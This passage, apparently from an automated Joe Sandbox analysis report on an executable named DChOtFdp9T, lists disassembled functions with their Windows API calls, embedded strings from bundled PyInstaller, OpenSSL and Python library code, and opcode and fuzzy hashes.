                                                                                                                                                                                                                            • Opcode ID: 19122c53f93b527cb3bfd77859c83df723aa9c7d1a194fd18752219da0b41a07
                                                                                                                                                                                                                            • Instruction ID: ce8b1beb32ad1c0984d1fefb0df0c1b04ba0e9863f4475068e786313a93d6531
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 19122c53f93b527cb3bfd77859c83df723aa9c7d1a194fd18752219da0b41a07
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F5F08C14F1A55656FBA8B3A4C866FFC53409F81340FD44230E63CCAADBEC5DA9821B11
                                                                                                                                                                                                                            Function 00007FFE0CFE1D30 Relevance: 9.1, APIs: 6, Instructions: 109COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1878218664.00007FFE0CFE1000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00007FFE0CFE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1878198987.00007FFE0CFE0000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1878236359.00007FFE0CFE3000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1878254447.00007FFE0CFE4000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1878272126.00007FFE0CFE5000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffe0cfe0000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: _aligned_free_aligned_malloc$callocfree
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2511558924-0
                                                                                                                                                                                                                            • Opcode ID: 8fb2105fd7c39bf321232f7441f6f1b7ebcf620c9448f78960a77339e4ca462d
                                                                                                                                                                                                                            • Instruction ID: df40fa3a048f76d2842b926ddd72b52c3b532bbae52ed5a1db825f84faef46e8
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8fb2105fd7c39bf321232f7441f6f1b7ebcf620c9448f78960a77339e4ca462d
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4F414F66A49B4186EB25CB4AE45437C63E0FF48B90F488531DE4D437B9EF7CE9958302
                                                                                                                                                                                                                            Function 00007FFDFF261050 Relevance: 9.1, APIs: 6, Instructions: 69COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877067967.00007FFDFF240000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877092897.00007FFDFF2C3000.00000020.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877173635.00007FFDFF2C5000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877203803.00007FFDFF2ED000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877227349.00007FFDFF2F1000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F2000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F8000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF300000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: L_sk_num$L_sk_freeL_sk_new_nullL_sk_pushL_sk_value
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1173513325-0
                                                                                                                                                                                                                            • Opcode ID: f33328ac1ef15b88206e7ae9f7b53d755a8dd9f36e47198a0a537a724c09c6b1
                                                                                                                                                                                                                            • Instruction ID: 026064715d986b2e1332a435373414474af17d39984afce5f3610b4c2db7e223
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f33328ac1ef15b88206e7ae9f7b53d755a8dd9f36e47198a0a537a724c09c6b1
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E821C511F0968246FF599A526861AB953A09F44FC0F480230EE7DC7BCFEE2CF4424700
                                                                                                                                                                                                                            Function 00007FF602998160 Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 64COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 00007FF602997AA0: GetCurrentProcess.KERNEL32 ref: 00007FF602997AC0
                                                                                                                                                                                                                              • Part of subcall function 00007FF602997AA0: OpenProcessToken.ADVAPI32 ref: 00007FF602997AD3
                                                                                                                                                                                                                              • Part of subcall function 00007FF602997AA0: GetTokenInformation.ADVAPI32 ref: 00007FF602997AF8
                                                                                                                                                                                                                              • Part of subcall function 00007FF602997AA0: GetLastError.KERNEL32 ref: 00007FF602997B02
                                                                                                                                                                                                                              • Part of subcall function 00007FF602997AA0: GetTokenInformation.ADVAPI32 ref: 00007FF602997B42
                                                                                                                                                                                                                              • Part of subcall function 00007FF602997AA0: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF602997B5E
                                                                                                                                                                                                                              • Part of subcall function 00007FF602997AA0: CloseHandle.KERNEL32 ref: 00007FF602997B76
                                                                                                                                                                                                                            • LocalFree.KERNEL32(?,00007FF602993814), ref: 00007FF6029981EC
                                                                                                                                                                                                                            • LocalFree.KERNEL32(?,00007FF602993814), ref: 00007FF6029981F5
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875006833.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1874987275.00007FF602990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875032378.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875084625.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                                                                                            • String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PYI_PATH_MAX!
                                                                                                                                                                                                                            • API String ID: 6828938-1529539262
                                                                                                                                                                                                                            • Opcode ID: dd7889b1bbec3b02e81406288b4e7ebbd0e5a1754232ba221b086f5150490535
                                                                                                                                                                                                                            • Instruction ID: b21214a01f55ea03cc9b48970e19f03a07b129cd4d520e8fd6af0c9e47bda314
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: dd7889b1bbec3b02e81406288b4e7ebbd0e5a1754232ba221b086f5150490535
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D921A621A187425AF710AB16E9153FA6BA1FF88798FA44435E94DC3787DFBCD910C740
                                                                                                                                                                                                                            Function 00007FF6029AA148 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,00007FF6029A414D,?,?,?,?,00007FF6029A930A,?,?,?,?,00007FF6029A61EF), ref: 00007FF6029AA157
                                                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF6029A414D,?,?,?,?,00007FF6029A930A,?,?,?,?,00007FF6029A61EF), ref: 00007FF6029AA18D
                                                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF6029A414D,?,?,?,?,00007FF6029A930A,?,?,?,?,00007FF6029A61EF), ref: 00007FF6029AA1BA
                                                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF6029A414D,?,?,?,?,00007FF6029A930A,?,?,?,?,00007FF6029A61EF), ref: 00007FF6029AA1CB
                                                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF6029A414D,?,?,?,?,00007FF6029A930A,?,?,?,?,00007FF6029A61EF), ref: 00007FF6029AA1DC
                                                                                                                                                                                                                            • SetLastError.KERNEL32(?,?,?,00007FF6029A414D,?,?,?,?,00007FF6029A930A,?,?,?,?,00007FF6029A61EF), ref: 00007FF6029AA1F7
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875006833.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1874987275.00007FF602990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875032378.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875084625.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Value$ErrorLast
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2506987500-0
                                                                                                                                                                                                                            • Opcode ID: d7258a963b453012969a6ad0a41331183a8a684c6c8b02150bb4772551ef5887
                                                                                                                                                                                                                            • Instruction ID: 2b11fe98feed3692f489ea1f102293dde1978b8413173d7977f817dd4a9c123e
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d7258a963b453012969a6ad0a41331183a8a684c6c8b02150bb4772551ef5887
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F2115E20E0C74252FB59A7275A411796AA25F48BBCF744B34E83E86BD7DEACB441C390
                                                                                                                                                                                                                            Function 00007FFDFF241ED3 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 178COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877067967.00007FFDFF240000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877092897.00007FFDFF2C3000.00000020.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877173635.00007FFDFF2C5000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877203803.00007FFDFF2ED000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877227349.00007FFDFF2F1000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F2000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F8000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF300000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: D_unlockD_write_lockH_deleteH_retrieveM_freeR_newR_set_debug
                                                                                                                                                                                                                            • String ID: ..\s\ssl\statem\statem_lib.c$tls_finish_handshake
                                                                                                                                                                                                                            • API String ID: 3705674076-1263350687
                                                                                                                                                                                                                            • Opcode ID: 61fafb869941b040af3c4f18b7e0063985800c0f2c71365ea2fbce2590ed2c64
                                                                                                                                                                                                                            • Instruction ID: 5aed115c01bf78554b29760bcd9234a0490e1454a59d3cf1253497bcc1c01e49
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 61fafb869941b040af3c4f18b7e0063985800c0f2c71365ea2fbce2590ed2c64
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6D814C62B0868689E7559F25D460BB937A0EB41B88F488235CF6DCB7DECF78E585C340
                                                                                                                                                                                                                            Function 00007FF602992300 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81windowCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875006833.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1874987275.00007FF602990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875032378.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875084625.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
                                                                                                                                                                                                                            • String ID: Unhandled exception in script
                                                                                                                                                                                                                            • API String ID: 3081866767-2699770090
                                                                                                                                                                                                                            • Opcode ID: 871562e2e37685642c61b886077a09c50489d96e77a218951f1cd4700f6b58b0
                                                                                                                                                                                                                            • Instruction ID: ef34a427f1518c5eaf43b796a104795b6c020d3000fdc189ec4866e2a649e1a4
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 871562e2e37685642c61b886077a09c50489d96e77a218951f1cd4700f6b58b0
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 08316232A1968289EB24DF62E8552F97B60FF89798F640135EE4E87B56DF7CD104C700
                                                                                                                                                                                                                            Function 00007FFDFF264CB6 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 75COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877067967.00007FFDFF240000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877092897.00007FFDFF2C3000.00000020.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877173635.00007FFDFF2C5000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877203803.00007FFDFF2ED000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877227349.00007FFDFF2F1000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F2000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F8000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF300000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: O_ctrlR_newR_set_debugR_set_error
                                                                                                                                                                                                                            • String ID: ..\s\ssl\ssl_lib.c$SSL_write_early_data
                                                                                                                                                                                                                            • API String ID: 3777157029-3084438645
                                                                                                                                                                                                                            • Opcode ID: 1d92c5f44f662569f0fafcbcf6ee68dc0954c0132fe7684d77c092e3898e8029
                                                                                                                                                                                                                            • Instruction ID: 1e4651ccd28d09eafb982c2ece26a1962bf8e222d904a6dd65860193ba217d5b
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1d92c5f44f662569f0fafcbcf6ee68dc0954c0132fe7684d77c092e3898e8029
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 87317C22B0964297E7699B61C6A1BBD6790FB41790F440236EBBDC77CACF7CE4618700
                                                                                                                                                                                                                            Function 00007FFDFF25AEA0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 68COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877067967.00007FFDFF240000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877092897.00007FFDFF2C3000.00000020.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877173635.00007FFDFF2C5000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877203803.00007FFDFF2ED000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877227349.00007FFDFF2F1000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F2000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F8000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF300000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: R_newR_set_debugR_set_error
                                                                                                                                                                                                                            • String ID: ..\s\ssl\ssl_conf.c$ctrl_switch_option
                                                                                                                                                                                                                            • API String ID: 1552677711-2996977199
                                                                                                                                                                                                                            • Opcode ID: 8640bd5f406015d52276d305d997fb3d4e0731d12e44a228e9b694fb6207fae1
                                                                                                                                                                                                                            • Instruction ID: 01a661e5cc8838fb7023b81a92f9cc02bb2fe93ef99e98dc3bd61f69a8cdcd7f
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8640bd5f406015d52276d305d997fb3d4e0731d12e44a228e9b694fb6207fae1
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A121CFB1F1954286FB989B15D8A2BB82351FF84744FD88235DA3CC37C9EE2DE5858B00
                                                                                                                                                                                                                            Function 00007FFE0CFD22C0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 67COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1878127469.00007FFE0CFD1000.00000020.00000001.01000000.0000002B.sdmp, Offset: 00007FFE0CFD0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1878106458.00007FFE0CFD0000.00000002.00000001.01000000.0000002B.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1878147059.00007FFE0CFD3000.00000002.00000001.01000000.0000002B.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1878163707.00007FFE0CFD4000.00000004.00000001.01000000.0000002B.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1878181390.00007FFE0CFD5000.00000002.00000001.01000000.0000002B.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffe0cfd0000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: memset$_wassert
                                                                                                                                                                                                                            • String ID: hs->curlen < BLOCK_SIZE$src/MD5.c
                                                                                                                                                                                                                            • API String ID: 3746435480-3464417081
                                                                                                                                                                                                                            • Opcode ID: 7f1cb24d2cef77a7a231d6f20bfbbbe03922dd2dcc5483f2393aa93274bf0da0
                                                                                                                                                                                                                            • Instruction ID: 5117116f2821a5cc1f1a7851f6539ebc662322f1d251d0988eb3c66fbec5f5c7
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7f1cb24d2cef77a7a231d6f20bfbbbe03922dd2dcc5483f2393aa93274bf0da0
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 85216032B1464187D708CF3DE49456D77A2FB49B58B048439EA9E87768DF3CD885CB40
                                                                                                                                                                                                                            Function 00007FF602992760 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 57windowCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875006833.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1874987275.00007FF602990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875032378.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875084625.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Message$ByteCharMultiWide
                                                                                                                                                                                                                            • String ID: %s%s: %s$Error$Error/warning (ANSI fallback)
                                                                                                                                                                                                                            • API String ID: 1878133881-640379615
                                                                                                                                                                                                                            • Opcode ID: a16eda6a30dddabb262c6ed33d56196ff85f87a25f458649902393945ef2728f
                                                                                                                                                                                                                            • Instruction ID: 318d22b170755d67a478e1c826c01c0feb160f0b4e86970919d69a126c05e5ff
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a16eda6a30dddabb262c6ed33d56196ff85f87a25f458649902393945ef2728f
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AC219172A28BC291E720DB16F4517EA6764FF8478CF500036EA8C8369ADFBCD255C740
                                                                                                                                                                                                                            Function 00007FFDFABD479C Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 57COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875123056.00007FFDFABD1000.00000020.00000001.01000000.00000019.sdmp, Offset: 00007FFDFABD0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875105491.00007FFDFABD0000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875139625.00007FFDFABD5000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875139625.00007FFDFAC32000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875139625.00007FFDFAC7E000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875139625.00007FFDFAC82000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875139625.00007FFDFAC87000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875139625.00007FFDFACDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875292663.00007FFDFACE2000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875308130.00007FFDFACE4000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdfabd0000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Arg_ArgumentSubtypeType_
                                                                                                                                                                                                                            • String ID: a unicode character$argument$east_asian_width
                                                                                                                                                                                                                            • API String ID: 1522575347-3913127203
                                                                                                                                                                                                                            • Opcode ID: 7b891638b4a45313673a93616f0d216ddcfc167a757208e07fea525010fbe4c5
                                                                                                                                                                                                                            • Instruction ID: 16d94189bdbf47cc5e28c77564e05107329f1c0f1f87a081949ccd843ee3b28b
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7b891638b4a45313673a93616f0d216ddcfc167a757208e07fea525010fbe4c5
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B1218E25F0CA8381EB5C8B12D4609796BA2BB45BC0F8885B5DA7E176D9DF3CE4958340
                                                                                                                                                                                                                            Function 00007FFDFABD4D5C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 53COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875123056.00007FFDFABD1000.00000020.00000001.01000000.00000019.sdmp, Offset: 00007FFDFABD0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875105491.00007FFDFABD0000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875139625.00007FFDFABD5000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875139625.00007FFDFAC32000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875139625.00007FFDFAC7E000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875139625.00007FFDFAC82000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875139625.00007FFDFAC87000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875139625.00007FFDFACDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875292663.00007FFDFACE2000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875308130.00007FFDFACE4000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
